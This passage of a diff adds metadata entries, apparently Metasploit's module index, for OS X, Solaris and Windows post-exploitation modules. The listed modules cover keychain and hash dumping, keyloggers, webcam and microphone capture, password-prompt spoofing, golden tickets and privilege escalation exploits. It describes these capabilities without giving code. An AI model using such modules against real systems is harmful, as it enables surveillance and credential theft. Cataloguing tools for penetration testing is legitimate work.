"SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/enum_colloquy": { + "name": "OS X Gather Colloquy Enumeration", + "fullname": "post/osx/gather/enum_colloquy", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + 
"sinn3r " + ], + "description": "This module will collect Colloquy's info plist file and chat logs from the\n victim's machine. There are three actions you may choose: INFO, CHATS, and\n ALL. Please note that the CHAT action may take a long time depending on the\n victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n to search for certain log names (which consists of the contact's name, and a\n timestamp). The default 'PATTERN' is configured as \"^alien\" as an example\n to search for any chat logs associated with the name \"alien\".", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_colloquy.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_colloquy", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ACCOUNTS", + "description": "Collect the preferences plists" + }, + { + "name": "ALL", + "description": "Collect both the plists and chat logs" + }, + { + "name": "CHATS", + "description": "Collect chat logs with a pattern" + } + ] + }, + "post_osx/gather/enum_keychain": { + "name": "OS X Gather Keychain Enumeration", + "fullname": "post/osx/gather/enum_keychain", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ipwnstuff ", + "joev " + ], + "description": "This module presents a way to quickly go through the current user's keychains and\n collect data such as email accounts, servers, and other services. 
Please note:\n when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n alert flash briefly on their screen that gets dismissed by a programmatically triggered click.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/osx/gather/enum_keychain.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_keychain", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": true, + "actions": [] + }, + "post_osx/gather/enum_messages": { + "name": "OS X Gather Messages", + "fullname": "post/osx/gather/enum_messages", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Geckom " + ], + "description": "This module will collect the Messages sqlite3 database files and chat logs\n from the victim's machine. There are four actions you may choose: DBFILE,\n READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n LATEST will retrieve the last X number of messages (useful with 2FA). 
Module\n was tested with OS X 10.11 (El Capitan).", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_messages.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_messages", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ALL", + "description": "Collect all Messages data" + }, + { + "name": "DBFILE", + "description": "Collect Messages DB file" + }, + { + "name": "LATEST", + "description": "Collect the latest message" + }, + { + "name": "READABLE", + "description": "Collect Messages DB and download in a readable format" + } + ] + }, + "post_osx/gather/enum_osx": { + "name": "OS X Gather Mac OS X System Information Enumeration", + "fullname": "post/osx/gather/enum_osx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n Mojave (10.14).", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_osx.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_osx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/gitignore": { + "name": "Git Ignore Retriever", + 
"fullname": "post/osx/gather/gitignore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "N!ght Jmp" + ], + "description": "This module finds potentially sensitive items by finding .gitignore files.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/osx/gather/gitignore.rb", + "is_install_path": true, + "ref_name": "osx/gather/gitignore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/hashdump": { + "name": "OS X Gather Mac OS X Password Hash Collector", + "fullname": "post/osx/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "hammackj ", + "joev " + ], + "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. 
Supports\n versions 10.3 to 10.14.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "osx/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/password_prompt_spoof": { + "name": "OSX Password Prompt Spoof", + "fullname": "post/osx/gather/password_prompt_spoof", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joff Thyer ", + "joev ", + "Peter Toth " + ], + "description": "Presents a password prompt dialog to a logged-in OSX user.", + "references": [ + "URL-http://blog.packetheader.net/2011/10/fun-with-applescript.html" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/password_prompt_spoof.rb", + "is_install_path": true, + "ref_name": "osx/gather/password_prompt_spoof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/safari_lastsession": { + "name": "OSX Gather Safari LastSession.plist", + "fullname": "post/osx/gather/safari_lastsession", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module downloads the LastSession.plist 
file from the target machine.\n LastSession.plist is used by Safari to track active websites in the current session,\n and sometimes contains sensitive information such as usernames and passwords.\n\n This module will first download the original LastSession.plist, and then attempt\n to find the credential for Gmail. The Gmail's last session state may contain the\n user's credential if his/her first login attempt failed (likely due to a typo),\n and then the page got refreshed or another login attempt was made. This also means\n the stolen credential might contain typos.", + "references": [ + "URL-http://www.securelist.com/en/blog/8168/Loophole_in_Safari" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/safari_lastsession.rb", + "is_install_path": true, + "ref_name": "osx/gather/safari_lastsession", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/vnc_password_osx": { + "name": "OS X Display Apple VNC Password", + "fullname": "post/osx/gather/vnc_password_osx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kevin Gonzalvo " + ], + "description": "This module shows Apple VNC Password from Mac OS X High Sierra.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/vnc_password_osx.rb", + "is_install_path": true, + "ref_name": "osx/gather/vnc_password_osx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ 
+ "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/manage/mount_share": { + "name": "OSX Network Share Mounter", + "fullname": "post/osx/manage/mount_share", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Peter Toth ", + "joev " + ], + "description": "This module lists saved network shares and tries to connect to them using stored\n credentials. This does not require root privileges.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/manage/mount_share.rb", + "is_install_path": true, + "ref_name": "osx/manage/mount_share", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + "description": "Show a list of stored network share credentials" + }, + { + "name": "MOUNT", + "description": "Mount a network shared volume using stored credentials" + }, + { + "name": "UMOUNT", + "description": "Unmount a mounted volume" + } + ] + }, + "post_osx/manage/record_mic": { + "name": "OSX Manage Record Microphone", + "fullname": "post/osx/manage/record_mic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "This module will allow the user to detect (with the LIST action) and\n capture (with the RECORD action) audio inputs on a remote OSX machine.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 
02:49:28 +0000", + "path": "/modules/post/osx/manage/record_mic.rb", + "is_install_path": true, + "ref_name": "osx/manage/record_mic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + "description": "Show a list of microphones" + }, + { + "name": "RECORD", + "description": "Record from a selected audio input" + } + ] + }, + "post_osx/manage/sonic_pi": { + "name": "OS X Manage Sonic Pi", + "fullname": "post/osx/manage/sonic_pi", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sam Aaron", + "wvu " + ], + "description": "This module controls Sonic Pi via its local OSC server.\n\n The server runs on 127.0.0.1:4557 and receives OSC messages over UDP.\n\n Yes, this is RCE, but it's local. I suggest playing music. :-)", + "references": [ + "URL-https://sonic-pi.net/", + "URL-https://github.com/samaaron/sonic-pi/wiki/Sonic-Pi-Internals----GUI-Ruby-API", + "URL-http://opensoundcontrol.org/spec-1_0" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/manage/sonic_pi.rb", + "is_install_path": true, + "ref_name": "osx/manage/sonic_pi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "audio-effects", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Run", + "description": "Run Sonic Pi code" + }, + { + "name": "Stop", + "description": "Stop all jobs" + } + ] + }, + "post_osx/manage/vpn": { + "name": "OSX VPN Manager", + "fullname": "post/osx/manage/vpn", + "aliases": 
[], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Peter Toth " + ], + "description": "This module lists VPN connections and tries to connect to them using stored credentials.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/manage/vpn.rb", + "is_install_path": true, + "ref_name": "osx/manage/vpn", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "CONNECT", + "description": "Connect to a VPN using stored credentials" + }, + { + "name": "DISCONNECT", + "description": "Disconnect from a VPN" + }, + { + "name": "LIST", + "description": "Show a list of VPN connections" + } + ] + }, + "post_osx/manage/webcam": { + "name": "OSX Manage Webcam", + "fullname": "post/osx/manage/webcam", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "This module will allow the user to detect installed webcams (with\n the LIST action), take a snapshot (with the SNAPSHOT action), or\n record a webcam and mic (with the RECORD action).", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/manage/webcam.rb", + "is_install_path": true, + "ref_name": "osx/manage/webcam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + 
"description": "Show a list of webcams" + }, + { + "name": "RECORD", + "description": "Record with the webcam" + }, + { + "name": "SNAPSHOT", + "description": "Take a snapshot with the webcam" + } + ] + }, + "post_solaris/escalate/pfexec": { + "name": "Solaris pfexec Upgrade Shell", + "fullname": "post/solaris/escalate/pfexec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module attempts to upgrade a shell session to UID 0 using pfexec.", + "references": [ + "URL-https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html", + "URL-http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html", + "URL-http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec" + ], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/escalate/pfexec.rb", + "is_install_path": true, + "ref_name": "solaris/escalate/pfexec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/escalate/srsexec_readline": { + "name": "Solaris srsexec Arbitrary File Reader", + "fullname": "post/solaris/escalate/srsexec_readline", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-05-07", + "type": "post", + "author": [ + "h00die", + "iDefense" + ], + "description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n When srsexec is executed in debug (-d) verbose (-v) mode,\n the first line of an arbitrary file can be read due to the suid bit set.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for 
cracking.", + "references": [ + "CVE-2007-2617", + "URL-https://download.oracle.com/sunalerts/1000443.1.html", + "URL-https://www.securityfocus.com/archive/1/468235", + "EDB-30021", + "BID-23915" + ], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/escalate/srsexec_readline.rb", + "is_install_path": true, + "ref_name": "solaris/escalate/srsexec_readline", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/gather/checkvm": { + "name": "Solaris Gather Virtual Environment Detection", + "fullname": "post/solaris/gather/checkvm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. 
This\n module supports detection of Solaris Zone, VMWare, VirtualBox, Xen,\n and QEMU/KVM.", + "references": [], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/gather/checkvm.rb", + "is_install_path": true, + "ref_name": "solaris/gather/checkvm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/gather/enum_packages": { + "name": "Solaris Gather Installed Packages", + "fullname": "post/solaris/gather/enum_packages", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Post module to enumerate installed packages on a Solaris system.", + "references": [], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/gather/enum_packages.rb", + "is_install_path": true, + "ref_name": "solaris/gather/enum_packages", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/gather/enum_services": { + "name": "Solaris Gather Configured Services", + "fullname": "post/solaris/gather/enum_services", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Post module to enumerate services on a Solaris system.", + "references": [], + "platform": "Solaris", + "arch": "", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/gather/enum_services.rb", + "is_install_path": true, + "ref_name": "solaris/gather/enum_services", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/gather/hashdump": { + "name": "Solaris Gather Dump Password Hashes for Solaris Systems", + "fullname": "post/solaris/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Post module to dump the password hashes for all users on a Solaris system.", + "references": [], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "solaris/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/capture/keylog_recorder": { + "name": "Windows Capture Keystroke Recorder", + "fullname": "post/windows/capture/keylog_recorder", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "Josh Hale " + ], + "description": "This module can be used to capture keystrokes. To capture keystrokes when the session is running\n as SYSTEM, the MIGRATE option must be enabled and the CAPTURE_TYPE option should be set to one of\n Explorer, Winlogon, or a specific PID. 
To capture the keystrokes of the interactive user, the\n Explorer option should be used with MIGRATE enabled. Keep in mind that this will demote this session\n to the user's privileges, so it makes sense to create a separate session for this task. The Winlogon\n option will capture the username and password entered into the logon and unlock dialog. The LOCKSCREEN\n option can be combined with the Winlogon CAPTURE_TYPE to for the user to enter their clear-text\n password. It is recommended to run this module as a job, otherwise it will tie up your framework user interface.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/capture/keylog_recorder.rb", + "is_install_path": true, + "ref_name": "windows/capture/keylog_recorder", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/capture/lockout_keylogger": { + "name": "Windows Capture Winlogon Lockout Credential Keylogger", + "fullname": "post/windows/capture/lockout_keylogger", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix ", + "cg" + ], + "description": "This module migrates and logs Microsoft Windows user's passwords via\n Winlogon.exe using idle time and natural system changes to give a\n false sense of security to the user.", + "references": [ + "URL-http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/capture/lockout_keylogger.rb", + 
"is_install_path": true, + "ref_name": "windows/capture/lockout_keylogger", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/droplnk": { + "name": "Windows Escalate SMB Icon LNK Dropper", + "fullname": "post/windows/escalate/droplnk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module drops a shortcut (LNK file) that has a ICON reference\n existing on the specified remote host, causing SMB and WebDAV\n connections to be initiated from any user that views the shortcut.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/droplnk.rb", + "is_install_path": true, + "ref_name": "windows/escalate/droplnk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/getsystem": { + "name": "Windows Escalation", + "fullname": "post/windows/escalate/getsystem", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "hdm " + ], + "description": "This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various\n techniques.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": 
"/modules/post/windows/escalate/getsystem.rb", + "is_install_path": true, + "ref_name": "windows/escalate/getsystem", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Named Pipe Impersonation", + "Token Duplication", + "RPCSS", + "PrintSpooler", + "EFSRPC", + "EfsPotato" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/golden_ticket": { + "name": "Windows Escalate Golden Ticket", + "fullname": "post/windows/escalate/golden_ticket", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will create a Golden Kerberos Ticket using the Mimikatz Kiwi Extension. If no\n options are applied it will attempt to identify the current domain, the domain administrator\n account, the target domain SID, and retrieve the krbtgt NTLM hash from the database. 
By default\n the well-known Administrator's groups 512, 513, 518, 519, and 520 will be applied to the ticket.", + "references": [ + "URL-https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/golden_ticket.rb", + "is_install_path": true, + "ref_name": "windows/escalate/golden_ticket", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/ms10_073_kbdlayout": { + "name": "Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation", + "fullname": "post/windows/escalate/ms10_073_kbdlayout", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-10-12", + "type": "post", + "author": [ + "Ruben Santamarta", + "jduck " + ], + "description": "This module exploits the keyboard layout vulnerability exploited by Stuxnet. When\n processing specially crafted keyboard layout files (DLLs), the Windows kernel fails\n to validate that an array index is within the bounds of the array. 
By loading\n a specially crafted keyboard layout, an attacker can execute code in Ring 0.", + "references": [ + "OSVDB-68552", + "CVE-2010-2743", + "MSB-MS10-073", + "URL-https://web.archive.org/web/20160308010201/http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1", + "EDB-15985" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb", + "is_install_path": true, + "ref_name": "windows/escalate/ms10_073_kbdlayout", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-down" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/screen_unlock": { + "name": "Windows Escalate Locked Desktop Unlocker", + "fullname": "post/windows/escalate/screen_unlock", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "L4teral ", + "Metlstorm" + ], + "description": "This module unlocks a locked Windows desktop by patching\n the respective code inside the LSASS.exe process. 
This\n patching process can result in the target system hanging or\n even rebooting, so be careful when using this module on\n production systems.", + "references": [ + "URL-http://www.storm.net.nz/projects/16" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/screen_unlock.rb", + "is_install_path": true, + "ref_name": "windows/escalate/screen_unlock", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-down" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/unmarshal_cmd_exec": { + "name": "Windows unmarshal post exploitation", + "fullname": "post/windows/escalate/unmarshal_cmd_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-08-05", + "type": "post", + "author": [ + "Nicolas Joly", + "Matthias Kaiser", + "Sanjay Gondaliya", + "Pratik Shah " + ], + "description": "This module exploits a local privilege escalation bug which exists\n in Microsoft COM for Windows when it fails to properly handle serialized objects.", + "references": [ + "CVE-2018-0824", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824", + "URL-https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn", + "EDB-44906" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/unmarshal_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/escalate/unmarshal_cmd_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + 
"artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/ad_to_sqlite": { + "name": "AD Computer, Group and Recursive User Membership to Local SQLite DB", + "fullname": "post/windows/gather/ad_to_sqlite", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n and write this to a SQLite database for offline analysis and query using normal SQL syntax.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/ad_to_sqlite.rb", + "is_install_path": true, + "ref_name": "windows/gather/ad_to_sqlite", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + 